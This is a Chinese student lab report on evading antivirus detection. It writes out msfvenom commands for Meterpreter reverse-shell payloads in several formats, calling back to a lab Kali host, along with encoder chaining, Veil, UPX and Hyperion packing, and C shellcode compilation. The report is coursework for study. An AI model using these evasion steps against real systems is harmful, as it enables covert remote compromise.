首页 > 其他分享 >20222419 2024-2025-1 《网络与系统攻防技术》实验三实验报告

20222419 2024-2025-1 《网络与系统攻防技术》实验三实验报告

时间:2024-10-23 21:32:24浏览次数:1  
标签:文件 exe 免杀 如下 2024 2025 msfvenom 20222419 veil

1.实验内容

1.1 实践内容

(1)正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧

  • 正确使用msf编码器,使用msfvenom生成如jar之类的其他文件
  • veil,加壳工具
  • 使用C + shellcode编程

(2)通过组合应用各种技术实现恶意代码免杀
如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要截图。
(3)用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

1.2 问题回答

(1)杀软是如何检测出恶意代码的?
杀软通过特征码匹配、行为监测和云端分析来检测恶意代码。
(2)免杀是做什么?
通过各种手段绕过杀毒软件的检测,使恶意代码不被发现。
(3)免杀的基本方法有哪些?
免杀的基本方法包括代码混淆、加密、使用漏洞、修改文件特征等。

2.实验过程

主机的IP:192.168.32.1
kali的IP:192.168.32.128

2.1 正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧

免杀效果的评价:VirusTotal是一个免费的在线病毒、恶意软件和URL检测服务,它可以帮助用户分析可疑文件和网址,以确定其是否存在潜在的安全威胁。

首先对实验二生成的程序进行检测,结果如下图:

(1)正确使用msf编码器,使用msfvenom生成如jar之类的其他文件

1.编码测试结果
编码一次:

结果如下:

编码19次:

结果如下:

观察发现:编码1次和编码19次的免杀效果没有区别。

2.生成.php文件
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.32.128 LPORT=2419 x> 20222419hxyphp.php

结果如下:

观察发现:.php文件的免杀效果比编码好
3.生成.jar文件
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.32.128 LPORT=2419 -f jar x > 20222419hxyjar.jar

结果如下:

观察发现:.jar文件免杀效果不如.php文件好,但是比编码的效果好
4.生成.py文件
msfvenom -p python/meterpreter/reverse_tcp -b '\x00' LHOST=192.168.32.128 LPORT=2419 x>20222419.py

结果如下:

观察发现:.py文件免杀效果最好。
5.生成.apk文件
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.32.128 LPORT=2419 x> 20222419.apk

结果如下:

观察如下:.apk文件的免杀效果第二好。

(2) 使用veil工具

成功安装veil工具

1.生成C文件
选择文件免杀Evasion

选择payload

设置IP和端口并查看

生成文件

结果如下:

2.生成py文件

结果如下:

3.压缩壳
upx 20222419hxy_veil.exe -o 20222419hxyl_yasuo.exe

结果如下:

4.使用加密壳
wine hyperion.exe -v 20222419hxy_veil.exe 20222419hxy_jiami.exe

结果如下:

5.使用C + shellcode编程
生成一段shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.32.128 LPORT=2419 -f c

写入C程序

转化为exe文件

结果如下:

(2)通过组合应用各种技术实现恶意代码免杀

  1. 使用C+shellcode编程 + 异或
    msfvenom -p windows/meterpreter/reverse_tcp -b '\x00' -e x86/shikata_ga_nai LHOST=192.168.32.128 LPORT=2419 -f raw | msfvenom -a x86 --platform windows -b '\x00' -e x86/bloxor -f c

异或:

转为exe文件:
i686-w64-mingw32-g++ 20222419(2).c -o 20222419(2).exe

结果如下:

2.在1的基础上加上加密壳
wine hyperion.exe -v 20222419(2).exe 20222419(2)_jiami.exe

结果如下:免杀能力反而下降

联想安全管家检测出了加密之后的exe程序

3.用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

主机版本:windows 10 家庭版
杀软版本:联想安全管家,版本5.1.70.5101

Windows执行生成的文件:

3.问题及解决方案

  • 问题1:运行veil时系统卡死然后重启,只有默认壁纸

  • 问题1解决方案:
    运行以下代码解决:

 apt-get clean
 apt-get remove xfce4 xfce4-places-plugin
 apt-get install x-window-system-core
 apt-get install kali-defaults kali-root-login desktop-base xfce4 xfce4-places-plugin
 reboot

4.学习感悟、思考等

  • 通过实验,我知道了免杀的基本原理及其实现方式,其中包括veil工具的使用、加壳工具的应用、C + shellcode的免杀技巧,以及使用VT等网站检测免杀效果。
  • 我发现使用加密壳后,文件更容易被杀软检测到,可能是因为加密壳在解密时的行为被监测到,而压缩壳的作用相对更大,它不仅能有效减少文件大小,还能隐藏文件的真实特征,增加被识别的难度。这使得压缩壳在免杀过程中显得更加有效。

标签:文件,exe,免杀,如下,2024,2025,msfvenom,20222419,veil
From: https://www.cnblogs.com/Taki16888/p/18494154

相关文章

  • 20222409 2024-2025-1 《网络与系统攻防技术》实验二实验报告
    1.实验内容1.1本周学习内容后门技术:学习了后门的定义及其在网络安全中的作用。后门是一种隐秘的进入方式,允许攻击者绕过正常的认证机制,获取系统访问权限。在实验中实践了如何利用后门获取shell。netcat:可以用于创建TCP/UDP连接,实现远程shell访问和文件传输。socat:功能更强大......
  • cyi 源鲁杯2024第一轮wp
    Round1Misc[Round1]hide_pngstegsolve黑白通道(需要自己适当调整大小),然后丁真YLCTF{a27f2d1a-9176-42cf-a2b6-1c87b17b98dc}[Round1]plain_crack给了build.py和初始的build,压缩后发现两个文件一样,且加密算法为zipcrypto,考虑明文攻击APCHPR,得到秘钥就可以停了使用......
  • 2024.6.29
    2024.6.29T1题面给定一个序列\(a\),从中若干个数,第\(i\)个元素有\(p_i\)的概率被选中,每个元素是否被选中之间是相互独立的。如果\(b\)的异或和为\(s\),称它的权值为\(s^2\),求\(b\)的权值的期望。答案对\(10^9+7\)取模。题解因为是异或操作,我们可以转到二进制......
  • 20222415 2024-2025-1 《网络与系统攻防技术》实验二实验报告
    1.实验内容本周学习了后门技术,包括后门的概念和实现方式,学习了后门攻击的过程和实践;并且初步学习了免杀。2.实验过程2.1使用netcat获取主机操作Shell,cron启动某项任务(1)使用netcat获取主机操作虚拟机登录root,主机在cmd窗口输入ncat.exe-l-p8888Linux虚机输入指令nc192.16......
  • 2024智能机器人与自动控制国际学术会议 (IRAC 2024) 2024 International Conference on
    @目录一、会议详情二、重要信息三、大会介绍四、出席嘉宾五、征稿主题一、会议详情二、重要信息大会官网:https://ais.cn/u/vEbMBz提交检索:EICompendex、IEEEXplore、Scopus三、大会介绍2024智能机器人与自动控制国际学术会议(IRAC2024)由华南理工大学主办,会议将于2024......
  • CSP-J 2024 游记
    CSP-J2024游记Day\(-3\)忐忑不安地期待。做了一套模拟。ProblemScoreDifficultiesA\(100\)入门B\(50\)(贪心策略错了)普及-C\(50\)(双重循环\(n<=10^5\))普及D\(20\)(dp+前缀和,我写的DFS)普及+B题交完废了,幸好后面\(2\)题还行,总分......
  • cyi 源鲁杯2024第二轮wp
    Round2Web[Round2]Cmnts查看源码,base64解码得到路径get_th1s_f1ag.phpparse_str($_SERVER['QUERY_STRING']);#将url?后面的字段截取,并分别设置成变量(变量覆盖)主要逻辑在这块(感觉应该是想考变量覆盖的,但是好像代码写错了?)if(isset($key)&&$key==='a7a795a8efb7......
  • 2024秋软工实践《先天软工圣体队》团队展示与《卷卷福》选题报告
    一、开头表格软件工程课程班级链接作业要求第一次团队作业作业目标开发一个基于LLM大模型接口的软件,为传统的软件赋予全新的体验和功能。团队名称先天软工圣体队团队成员学号-名字102201312-陈言泷052206123-柯鸿毅102201531-周炳辉102201313-陈尚冰10......
  • 2024.10.23训练记录
    上午NOIP模拟A简单题。类比树状数组,反向做二维前缀和。在数组中对于左上角为{x_1,y_1},右下角为{x_2,y_2}的矩阵实现+k操作。只需要在{x_1,y_1},{x_2+1,y_2+1}位置+k,{x_2+1,y_1},{x_1,y_2+1}位置-k。最后再做一遍二维前缀和。很好想到的。想到是应该的。考试......
  • 2024秋软工实践 第二小组团队展示与选题报告
    作业所属课程https://edu.cnblogs.com/campus/fzu/SE2024作业要求https://edu.cnblogs.com/campus/fzu/SE2024/homework/13290作业的目标初步决定大作业选题,并进行需求分析和答辩团队名称旺仔水饺102201140黎曼102201130黄俊瑶102201127罗永辉102201......